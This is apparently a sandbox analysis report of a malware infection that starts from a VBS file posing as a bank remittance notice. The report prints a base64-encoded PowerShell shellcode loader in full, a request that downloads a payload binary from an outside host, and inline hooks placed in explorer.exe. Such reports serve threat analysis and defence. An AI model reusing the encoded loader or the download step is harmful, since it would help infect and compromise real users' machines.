                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                          Jan 24, 2022 15:49:14.414664030 CET10345OUTData Raw: 71 68 30 51 34 58 6d 6c 2d 6e 54 4f 35 43 51 39 5a 33 66 35 41 50 63 75 4c 62 68 69 58 67 4a 6c 48 6e 2d 55 6c 72 35 47 72 77 58 4a 69 39 45 6f 6c 6a 64 76 37 4a 6d 37 64 41 6b 57 64 49 6d 56 6a 6e 6a 4c 35 33 71 64 6e 62 49 54 37 35 58 36 58 57
                                                          Data Ascii: qh0Q4Xml-nTO5CQ9Z3f5APcuLbhiXgJlHn-Ulr5GrwXJi9Eoljdv7Jm7dAkWdImVjnjL53qdnbIT75X6XWbm39F7-p9TVx6rCpf2GYMoADgFfZCvjQjV3EK~TRZEL28EaL4xYCcZu849iNhBfTEiQaHHzOgH4rlVr(dLziNyeTFO6HsbbFvdeQXvWXF0ejPEUi_YSUc(gJoJUspo1sbJHyOqPJoXSyMER~q1SUzg-QBGf~wqZZk


                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.649820151.106.117.33443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-01-24 14:47:32 UTC0OUTGET /bin_FlDFmmV154.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: www.bulkwhatsappsender.in
                                                          Cache-Control: no-cache
                                                          2022-01-24 14:47:32 UTC0INHTTP/1.1 200 OK
                                                          Connection: close
                                                          content-type: application/octet-stream
                                                          last-modified: Mon, 24 Jan 2022 02:51:38 GMT
                                                          etag: "2e640-61ee143a-cdd142f5d7380e2;;;"
                                                          accept-ranges: bytes
                                                          content-length: 190016
                                                          date: Mon, 24 Jan 2022 14:47:32 GMT
                                                          server: LiteSpeed
                                                          content-security-policy: upgrade-insecure-requests
                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                          2022-01-24 14:47:32 UTC0INData Raw: 0c 9a 40 09 8f c7 84 af 0b 49 6f 67 41 37 3d 80 79 02 59 6e 26 74 89 91 46 91 a2 d0 13 48 49 07 d8 e3 e5 5f 73 47 99 af fd 1c 7a 58 40 c2 0e 57 63 d7 22 60 e4 de eb 5d 9e 2a ec 3d 86 6d 56 b3 1d bb c2 3c ba ed d8 1c 83 8b cd 7f 9b 12 00 e1 f0 82 e3 d6 d3 f5 2f 52 e4 ee b3 11 04 02 0d e1 91 ec 12 e5 7c 37 d2 d9 6b 67 88 64 77 fc 13 63 27 36 7e 4b f9 12 2c 24 b1 de 80 ed d4 5e e5 dd 74 43 61 ad 96 b3 91 22 df 7f 2d a1 08 54 fe b9 02 7d 8c e8 34 b3 0a e1 5d 33 b1 c1 81 91 a7 e2 60 62 f5 be f9 5c db e0 9f c3 63 53 9e 48 7d f5 1f cc a0 f2 eb e6 1f c6 ef a1 0e 7d 53 06 6f 06 0e 46 35 c8 af 16 df 46 51 f5 27 8e e8 8e 5f a8 7a ad 9b 36 12 6b 18 f8 d9 26 49 84 b7 e8 88 1c 7e 3c 69 11 08 f6 f4 f2 77 83 10 64 a4 e8 7c 20 53 2b ed 7b 2a 09 dd 79 ee 52 7d c5 48 f0 14
                                                          Data Ascii: @IogA7=yYn&tFHI_sGzX@Wc"`]*=mV</R|7kgdwc'6~K,$^tCa"-T}4]3`b\cSH}}SoF5FQ'_z6k&I~<iwd| S+{*yR}H
                                                          2022-01-24 14:47:32 UTC16INData Raw: 89 ad 4c 62 dc 96 cd 6a 9c 5d 23 cd fa 34 d0 d2 9b f1 a0 bb 98 16 e8 2a 95 ad f7 84 2f 76 96 9a 0e c7 c2 9f 93 9d 9d af e3 c0 34 36 e6 48 02 23 f9 df 7a 65 17 3d a7 f7 91 f5 c3 78 f9 d5 86 c2 29 90 ce bf 10 f1 01 6e d7 dd 88 ab 04 52 96 15 d8 37 12 14 98 25 ca a1 37 87 2e a5 c0 07 ea a7 89 e0 51 2a 8c f3 34 08 88 a7 a1 cc 68 9b b6 7e 50 12 71 64 e1 89 2a 0c be f5 12 5c 0a e5 bd ac 3a 6d d3 61 bc be 96 7d 59 71 10 27 7d 17 11 ef e0 db 71 f5 fa fc 39 0f 94 cd a1 25 70 4b 18 0a 6d 09 8b 0c fe 5d 62 8c 27 5e b0 41 c2 4c aa df b1 bd c1 22 31 63 0c 54 3e b7 89 94 63 c1 e1 db 22 03 15 62 4d cc df bd fd 23 b4 74 cb 9d f6 41 da 56 cd eb e5 13 f3 31 85 85 43 a9 8d f0 65 e2 2f ef a7 7c 9a b8 84 39 92 c8 9b f2 a5 f6 00 78 3a 82 8a b1 f6 df a1 17 1c eb 77 11 d0 d8 bd
                                                          Data Ascii: Lbj]#4*/v46H#ze=x)nR7%7.Q*4h~Pqd*\:ma}Yq'}q9%pKm]b'^AL"1cT>c"bM#tAV1Ce/|9x:w
                                                          2022-01-24 14:47:32 UTC32INData Raw: c3 01 0e f9 d4 e1 a8 6f 42 a6 09 aa fc 29 54 33 90 a6 cf b7 17 42 51 90 20 a2 34 60 6f 55 74 d7 5c 1f 0e ce f9 d6 ec 6c d6 9a cf ca 1d d7 b7 b3 e1 2a a2 25 61 8e c3 52 1f 96 4a 1b f3 62 08 1e 6e 17 e5 10 63 8b 3d 0a 72 be 85 72 92 23 1b 6d fb f3 9b e8 93 41 dd 73 e6 21 a1 e9 33 8b 21 95 95 cc d9 3f ad 7a a5 3c e9 f8 2b c7 de 72 04 bf 70 4f 0f 95 fe 70 ce e5 6e 69 3e a8 79 4e c5 00 3d 39 2a 76 e9 27 a1 f3 49 81 8b b5 11 8c 64 17 36 3f f8 6a 98 e4 87 c6 b7 fd 5a 78 88 90 0f 13 a5 42 de a4 0e 0f dc 76 cf 1b 53 45 94 01 82 6e 3e a5 e4 23 0a fc 09 90 8b 93 7e 48 9a d5 73 e4 06 1b fe fa 0f 56 d3 da 6e 9a 61 29 b8 39 01 24 3b 93 f6 42 d9 a0 e2 a8 5d 0d 80 ed 1d 81 6b 3d dc ee 25 dd 47 8a 9f 27 56 a7 cc e0 d6 a9 18 65 89 4e 70 09 8d d2 a7 1f 03 bc bb dc 93 74 33
                                                          Data Ascii: oB)T3BQ 4`oUt\l*%aRJbnc=rr#mAs!3!?z<+rpOpni>yN=9*v'Id6?jZxBvSEn>#~HsVna)9$;B]k=%G'VeNpt3
                                                          2022-01-24 14:47:32 UTC48INData Raw: 90 7e 17 b3 50 e4 c8 d7 a3 96 ef 59 62 fe c7 7c 87 c5 1f aa 86 38 e6 d9 16 46 dc 07 d9 6a d7 d4 5a 08 55 44 8d 14 12 fd db b3 2e f9 dd 57 f4 83 73 da 6f c4 cc d3 34 ae 97 af eb 45 9f 42 e4 f2 95 18 88 6f 06 26 7e 71 4a 68 04 8f 3e d4 68 2b 37 50 40 b0 54 7a 45 63 01 bb f6 14 09 7b af f4 cd b3 1f 63 a5 8a 6c f8 a8 8c 6b c5 18 cd f4 fd 0c 4b fe 47 91 d0 ef dd f2 ac c1 d1 79 ee d7 a6 b1 68 9a 5f b6 61 4b 67 11 0d 86 b0 39 02 ef 46 12 cc bc 54 d3 bf f3 f0 98 98 f1 04 f1 24 4f 25 ae 93 00 a7 b9 8c 06 cb 33 71 8f 4b ec 82 10 d9 8d 4f 09 0d 0f 90 66 94 58 48 f9 f9 c8 7d 37 57 b8 06 45 35 8a 55 bd a2 b5 60 71 6f 21 8e 9a 3a db d9 81 60 78 a3 fa a8 5c dd ac 7c 98 88 2b 64 fe d6 75 e8 91 4a d8 ac 1a 61 ae 29 40 c1 85 e7 5d fc c4 3d cb f0 53 70 e4 cd 3f e9 7f d2 1c
                                                          Data Ascii: ~PYb|8FjZUD.Wso4EBo&~qJh>h+7P@TzEc{clkKGyh_aKg9FT$O%3qKOfXH}7WE5U`qo!:`x\|+duJa)@]=Sp?
                                                          2022-01-24 14:47:32 UTC64INData Raw: 5c ca e6 bd ac 80 26 fb 88 6f c7 e6 a2 93 b5 34 f3 30 8d ed d0 1f 24 23 28 57 cf dc 82 c8 b3 9a 92 78 60 b8 fe 92 f6 db d0 2b f5 4b 2e 27 d7 bd 98 95 b1 55 54 cc 60 a7 7e 87 63 0c 5a 7a 9b 57 e8 22 de 7f bf dd fc 9e 29 96 d5 1f 66 d3 bb bf ff 5e 72 9f 2a 2e 3c 8d e9 dd 42 96 31 7c d4 c8 af 19 01 f0 1e 16 bd 33 f6 16 e0 79 c6 85 4a aa a2 f3 11 6f 27 b3 c5 7d 9d 62 28 60 6e 64 60 77 38 8b 76 cf af 1b e2 e7 3c d3 96 85 55 12 e6 d6 ff 73 28 1d d5 21 66 d5 e5 37 96 69 e3 87 1c 1e 29 b5 11 63 3b 1a 82 0c b9 f3 c0 b3 d2 42 e4 da 28 0f bf dc e5 b7 b0 1b 97 16 b7 b1 68 6d cb 37 37 38 35 ed 8a 2d cb 53 c2 9a 05 8a 53 e5 92 8e 25 99 b3 4c be f7 d2 8f 1a e0 ea ec 9b 88 03 40 32 d8 63 76 c0 6c 4e d1 db 4e 8c d6 05 1b e3 e5 dd f9 98 d3 fc c8 5c 13 0a a3 04 20 cd 28 2d
                                                          Data Ascii: \&o40$#(Wx`+K.'UT`~cZzW")f^r*.<B1|3yJo'}b(`nd`w8v<Us(!f7i)c;B(hm7785-SS%L@2cvlNN\ (-
                                                          2022-01-24 14:47:32 UTC80INData Raw: 8d 39 95 3e 7c 06 a0 d7 9d 60 62 4f 24 87 96 5f 33 1f 40 c9 a4 99 e6 99 64 01 0f f3 74 ef 6c 94 d1 db c7 fc f3 64 6d 22 c2 83 82 d4 09 8a ff 65 ad 68 3c e5 e7 b4 4b 10 67 88 fc ce be 96 91 7c 48 17 d3 f8 3b 70 b2 a7 fc 1d 8a 08 ca 8a df a1 fa ce f4 d5 b3 e9 67 01 c3 54 f2 c1 9e be 1c ba 64 5b 14 b1 51 24 11 da 8d 4f 3f cd 3e 8f 97 96 fa 0a 88 c5 17 d5 9a c2 b1 18 85 a9 28 2a 60 bb cc 67 72 34 ec 27 1c 93 01 93 01 e0 24 fd fa 13 cb b1 38 3f 9f 48 fa 28 1c 1c 3f e4 a3 1a f8 21 9a f8 ec a8 0f 2a e4 cf 2f c0 d9 22 38 96 d8 71 ef 5c 83 b2 03 50 d0 8a f4 5e f7 45 a2 c0 e3 e3 7a 86 c3 57 cf ed 3f 68 10 ba a3 ee 31 15 6b b9 22 76 8d da 21 48 bf 20 24 76 58 5e 2e 2d e7 3f ec 05 b5 ce af 9d 28 22 f6 fb 5f 10 40 3a 1b 42 53 d1 bd 24 2d 68 8a 11 5d 10 71 99 03 28 e4
                                                          Data Ascii: 9>|`bO$_3@dtldm"eh<Kg|H;pgTd[Q$O?>(*`gr4'$8?H(?!*/"8q\P^EzW?h1k"v!H $vX^.-?("_@:BS$-h]q(
                                                          2022-01-24 14:47:32 UTC96INData Raw: 31 39 ee 52 2d 48 05 58 45 6d 1c 0d 15 ee f2 84 32 a2 43 10 34 11 dd b0 ab 2c 13 21 dc 28 45 19 58 59 1f ac 27 7d d7 fc de 88 e7 12 cf ce 72 98 37 22 d2 9d 14 c7 3e b1 7a dd ac 66 1f 8e fd 98 02 5d 50 f8 58 3c 5c 01 38 22 d6 aa 5f df 2e 78 70 d9 72 65 46 a2 55 b7 2c 7a a3 f5 2c 52 5b 04 68 13 f5 8e b7 c6 e6 33 d2 91 20 d8 44 c6 5e 9f d6 3c 8a 01 1f c4 6a f8 a6 5e 08 fd dc 4d 77 50 f1 b8 ea 9f b3 9e 45 ad 2f 34 ea bd 5c 76 b4 66 1a 40 b1 ee b8 48 a4 31 d4 09 36 f4 3d ad 88 6b 92 ee 9d 61 d9 e0 05 44 aa e3 3e 3e b3 18 cd f0 ab 6c 9c 1c 15 d9 30 2b 2e 20 55 d1 e7 87 23 98 2a 33 26 f9 5f 6b e0 54 37 98 55 16 a1 71 8b 21 1e 5d ef 28 62 6e 9d e8 5d f5 b8 d8 0a 5b 48 4e ab 30 1d d2 38 25 61 4d 23 20 3e bc 4c c9 c2 3d 7f 06 d6 c3 21 01 a1 8e 52 3d ef 50 de fd 26
                                                          Data Ascii: 19R-HXEm2C4,!(EXY'}r7">zf]PX<\8"_.xpreFU,z,R[h3 D^<j^MwPE/4\vf@H16=kaD>>l0+. U#*3&_kT7Uq!](bn][HN08%aM# >L=!R=P&
                                                          2022-01-24 14:47:32 UTC112INData Raw: ac 9c b0 b4 a4 01 b7 fe 07 c1 80 e5 68 10 6b ac 8b 55 1b 30 50 7c 6d 34 e8 7c 89 66 ae bb 64 3f d6 89 27 4d 4e 4a 7e 9f 63 3b 6e 21 de 2b 0b f7 d8 a6 50 e2 e1 44 5e b6 ed 6e 04 05 b8 e2 7c 2c cd 53 9e 12 0e 3d 6e e3 ab 5a b9 72 ac 40 5c c4 ee 65 09 fa ef fb df e7 fa b6 8a c8 2d b1 8e 11 8c fc 1d fc 79 63 77 bd 3b 43 a9 fa 0c aa 4e 21 03 29 0c db 25 a9 6c d7 96 bb 1d 52 8c be 75 8a 3c bf 4e 20 a6 80 39 f1 7c 1d 86 a5 69 a0 fc 03 52 1a e1 ff c9 8d 49 81 03 46 0c 87 c9 e0 7d 50 58 f8 36 51 a5 a0 7e 26 32 e2 c0 d8 d2 92 96 62 66 9f 49 48 64 ee 53 4f c2 dd 28 2d d1 c9 4a 02 41 5d 07 43 b2 54 86 fd be 4c 36 09 81 c2 e9 3e 34 fd 2f a2 65 e8 9a 6d f8 a8 b0 94 42 ce e5 92 b9 b4 4a 75 1a 99 0d 76 2e 11 95 09 2d cd 71 3c 28 4e a4 7b 59 e8 ba cd d2 10 79 dd 57 5d 4c
                                                          Data Ascii: hkU0P|m4|fd?'MNJ~c;n!+PD^n|,S=nZr@\e-ycw;CN!)%lRu<N 9|iRIF}PX6Q~&2bfIHdSO(-JA]CTL6>4/emBJuv.-q<(N{YyW]L
                                                          2022-01-24 14:47:32 UTC128INData Raw: ca 25 c1 96 de e0 eb 88 6c 24 b8 c1 cb 49 8c 0a 26 01 3e 78 66 fe a1 91 dc 29 37 3f 9e ee cd 8a 2c f1 07 ad a4 43 a7 11 04 8d 18 ca ee 85 aa f4 3c 57 1f f6 94 aa 93 83 c5 3b 63 1a 1c e4 8c d5 d4 eb 82 97 4e 75 b0 96 9a 31 6f 3e 02 53 79 b9 e7 ce 92 fc 65 14 f7 8a 93 84 16 dd bb a8 8c 2e df db b2 4b b0 48 f7 d4 09 44 02 8a b7 42 ec fd 9f 5a b6 08 24 1b b9 40 80 27 bb 2a 44 0c 7c c0 f4 c2 93 e6 f2 e0 b4 09 94 4c 59 06 2d 8c 00 8a f0 3a d4 a9 b9 3c c1 9c 26 06 9e 7f 86 0c 5e 24 3c 42 2f 4b ba e7 b7 07 58 09 0e 2e 9a 8e b1 2a b4 5b 53 3f 82 f7 d0 0b 0c 0a 2e 03 d5 0a 51 0e 5f ac 0c 69 69 e7 55 44 23 28 8c 3c e9 75 d6 11 e1 56 58 f2 d1 c5 be 8b 99 26 9d 78 f8 51 d2 c0 2d 7f 92 d9 d7 32 99 40 de a2 26 05 79 c3 0c 71 44 46 1e 84 a6 e6 9d e8 3f 4d 7f 0a 8d 4a 41
                                                          Data Ascii: %l$I&>xf)7?,C<W;cNu1o>Sye.KHDBZ$@'*D|LY-:<&^$<B/KX.*[S?.Q_iiUD#(<uVX&xQ-2@&yqDF?MJA
                                                          2022-01-24 14:47:32 UTC144INData Raw: e8 28 90 80 77 f3 89 46 bb 5b 0a cf 55 f4 cb ea 24 1a 59 46 64 96 94 fb 43 ed a8 50 34 f8 ee 7e 76 d4 23 50 7e 66 62 1f 26 c4 71 b0 85 c1 e0 ab 2c d1 14 99 a9 f4 3b e9 dc 25 4a d5 d3 6a 04 3a c2 36 7f 04 5f 59 17 95 9c 1f 6c 46 7a 8b 6c cf ed 38 29 b7 5a 89 9c 83 0c ef 0d 7e 11 32 c5 80 94 13 29 94 72 36 87 69 18 a4 b4 a4 fe 15 f6 f0 85 8f 32 79 aa 6f 06 0d 63 05 7d 19 0a a8 8c 3d c7 dd 65 43 d9 3e 70 64 05 9b b1 9c a2 78 51 19 15 be 11 79 68 e7 84 a3 21 71 5c 72 97 03 92 ff 51 fb 59 8c 6b 44 f0 05 b7 84 84 55 bb 0c 1a 48 c0 70 a6 7a c9 98 ee f0 98 32 0c 08 56 80 e1 62 d7 4b d2 54 17 be 77 5d 1a c2 2d af 9c 63 81 ad 35 99 e2 c9 b2 fd 84 51 5f 85 4d eb 28 57 12 bb 85 9a 99 4d 00 a2 2a 53 35 93 93 1d 8e bf 93 1e 83 67 74 45 23 1e f4 6f 42 59 50 f4 43 2e 78
                                                          Data Ascii: (wF[U$YFdCP4~v#P~fb&q,;%Jj:6_YlFzl8)Z~2)r6i2yoc}=eC>pdxQyh!q\rQYkDUHpz2VbKTw]-c5Q_M(WM*S5gtE#oBYPC.x
                                                          2022-01-24 14:47:32 UTC160INData Raw: 5e 93 f5 81 51 e5 ec 43 10 51 48 75 fd be 7b 44 9b 81 67 4d 22 fe 31 dc 4f 31 8b 20 47 77 ae c0 fd aa e4 7f c4 99 64 07 7e e3 ca ff 60 f3 6d 14 4d 89 bf d8 82 07 4f a8 14 38 4f e8 e9 1b 6f 07 72 5d 7b 48 45 59 b7 59 f1 a2 8f fb 65 e3 20 d2 a5 0e 95 ae 40 2f 09 73 83 bf 2a 4d 55 0c 91 d5 ce a0 82 2b 2b 8b 55 9c 4a ff a9 49 49 2c 47 5d ed 34 82 20 27 68 ac b1 cb 50 df c0 ec 1e df 51 93 f7 38 ef b7 de 82 af 39 cb 80 b4 28 62 69 ac 11 e8 31 7b 09 9a 83 a1 5a 91 a4 35 5c 78 1e 55 d4 49 f5 44 14 e1 22 d5 1c 42 78 59 ad 15 0c db 48 bf 7c e3 ff 72 49 6e ba 9d 4c 8c b5 2d ce 7e 13 33 e5 40 e1 3d 7e 14 34 d2 30 31 3b 8f 3e db 67 a3 1a ec 8d 1c 87 49 a9 bf af ce 02 ce c2 87 00 79 4d b7 7e 06 c1 e1 7b 69 88 a8 34 09 3e 8b 0d 14 35 83 2e 3a 3f f9 18 4d de af 72 ed 7e
                                                          Data Ascii: ^QCQHu{DgM"1O1 Gwd~`mMO8Oor]{HEYYe @/s*MU++UJII,G]4 'hPQ89(bi1{Z5\xUID"BxYH|rInL-~3@=~401;>gIyM~{i4>5.:?Mr~
                                                          2022-01-24 14:47:32 UTC176INData Raw: ce de f2 0d 3c d8 4e fc 29 6d d2 3a a0 a4 7c 23 45 19 48 3c d2 51 1a 3b b3 3c 7f a7 cf 25 ee 9c c8 83 0a ce 73 b2 96 85 4a cf de 0b 1b 4a e4 3b 52 d9 65 7f 9d 21 45 f3 61 6d ac 2d e4 29 34 49 eb 73 b2 f5 26 d8 94 00 a0 4c c9 63 2a 0c 8b 8b 7c 9a 0e 92 44 45 53 fd d6 1f 7e a7 c3 34 8e 1c 3e 04 05 c4 2d 21 4e a7 5f eb 9a 60 50 18 c4 91 10 ce 9c 39 7e b2 0c e1 e3 ac 27 d4 ac 29 5a 34 f6 52 3f 14 72 a3 03 c3 5a b0 87 b9 9a b6 09 f5 25 05 89 48 2c 3f 51 54 2a 88 2f 3e e7 66 4a 96 e5 ad cf 05 15 aa 87 47 36 c0 0a 5c 4a ed 57 0e bc 07 69 ce c0 1f 22 dc 5c e0 11 57 88 bf 19 19 d9 31 63 03 9f 97 14 47 73 fc d1 41 1c 89 61 3c e7 9e 24 d2 46 89 49 99 d8 48 42 aa 7a 97 7c 83 b3 0f 81 8a 05 e9 9a 5d c6 b8 39 73 c9 37 ad b5 09 10 ca c8 c1 1e da 28 6f 2b 18 31 8c 39 3f
                                                          Data Ascii: <N)m:|#EH<Q;<%sJJ;Re!Eam-)4Is&Lc*|DES~4>-!N_`P9~')Z4R?rZ%H,?QT*/>fJG6\JWi"\W1cGsAa<$FIHBz|]9s7(o+19?


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function NameHook TypeActive in Processes
                                                          PeekMessageAINLINEexplorer.exe
                                                          PeekMessageWINLINEexplorer.exe
                                                          GetMessageWINLINEexplorer.exe
                                                          GetMessageAINLINEexplorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: user32.dll
                                                          Function NameHook TypeNew Data
                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE4
                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE4
                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE4
                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE4

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:15:45:08
                                                          Start date:24/01/2022
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Remittance Information (MT-103).vbs"
                                                          Imagebase:0x7ff7e9710000
                                                          File size:163840 bytes
                                                          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:15:45:13
                                                          Start date:24/01/2022
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAVQBuAHAAbAAgAE8AdQB0AHMAaABvADgAIABuAG8AbgBwAG8AcwAgAFQAYQBsAGUAaABtACAAUAByAG8AdABlADIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGoAbwBiAG4AYQB2AG4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARABSAE8ATgAiACAADQAKACQATwBmAGEAeQB2AGUAMwA9ADAAOwANAAoAJABPAGYAYQB5AHYAZQA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAE8AZgBhAHkAdgBlADgAPQBbAE8AZgBhAHkAdgBlADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQATwBmAGEAeQB2AGUAMwAsADAALABbAHIAZQBmAF0AJABPAGYAYQB5AHYAZQA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMAYQBpAHMAaABhAGgAcwBrAGEAIAB3AGgAYQBtAHAAbABhAHYAZQAgAFMAdAB1AGQAaQA3ACAAQQBsAGwAZQBnAHIAZQA4ACAAUABhAHIAdABpAGMAdQBsAGEAcgAzACAAUwBhAHYAYQBnADMAIABhAG4AawBvAG0AcwB0AHIAIABCAFkARwBOAEkATgBHAFMAUwBOACAAUwBwAGUAZQBkAGUAIABWAGkAbgBoAHMAMgAgAFUAbgBkAGUAcgBlADgAIABFAHAAdQByAGEAbABiAGkAYQBsACAAUwBVAEIAVABFAFMAVAAgAEQAZQBn